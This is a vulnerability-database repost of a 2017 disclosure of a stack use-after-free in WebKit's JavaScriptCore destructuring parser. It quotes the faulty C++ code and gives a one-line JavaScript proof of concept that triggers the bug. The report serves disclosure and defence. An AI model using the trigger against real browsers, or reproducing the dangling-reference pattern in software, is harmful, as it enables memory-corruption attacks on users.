WebKit JSC ObjectPatternNode::appendEntry Use-After-Free

2017.07.25

Credit: ifratric

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

 WebKit: JSC: Stack-Use-After-Free in ObjectPatternNode::appendEntry
Here's a snippet of ObjectPatternNode::appendEntry.
void appendEntry(const JSTokenLocation&, ExpressionNode* propertyExpression, DestructuringPatternNode* pattern, ExpressionNode* defaultValue, BindingType bindingType)
{
m_targetPatterns.append(Entry{ Identifier(), propertyExpression, false, pattern, defaultValue, bindingType });
}
Here's the definition of Entry.
struct Entry {
const Identifier& propertyName;
ExpressionNode* propertyExpression;
bool wasString;
DestructuringPatternNode* pattern;
ExpressionNode* defaultValue;
BindingType bindingType;
};
The Identifier object created by "Identifier()" is in the stack. So it will get freed in the end of the appendEntry method.
PoC:
var {[a]: b, ...[]} = {};
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
Found by: lokihardt

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

WebKit JSC ObjectPatternNode::appendEntry Use-After-Free

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.